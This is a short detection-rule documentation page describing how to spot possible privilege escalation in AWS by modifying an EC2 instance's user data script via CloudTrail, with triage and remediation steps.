Possible AWS EC2 privilege escalation via the modification of user data

cloudtrail

Classification:

attack

Tactic:

TA0004-privilege-escalation

Technique:

T1098-account-manipulation

이 페이지는 아직 영어로 제공되지 않습니다. 번역 작업 중입니다.
현재 번역 프로젝트에 대한 질문이나 피드백이 있으신 경우 언제든지 연락주시기 바랍니다.

Goal

Detect a user attempting to modify a user data script on an EC2 instance.

Strategy

This rule allows you to monitor CloudTrail and detect if an attacker has attempted to modify the user data script on an EC2 instance using the following API calls:

Triage and response

  1. Determine if {{@userIdentity.session_name}} should have modified the user data script associated with {{host}}.
  2. If the API calls were not made by the user:
  • Rotate user credentials.
  • Determine what other API calls were made by the user.
  • Follow your company’s incident response process to determine the impact to {{host}}.
  • Revert the user data script to the last known good state with the aws-cli command modify-instance-attribute or use the AWS Console.
  1. If the API calls were made by the user:
  • Determine if the user should be modifying this user data script.
  • If No, see if other API calls were made by the user and determine if they warrant further investigation.
PREVIEWING: aliciascott/DOCS-9725-Cloudcraft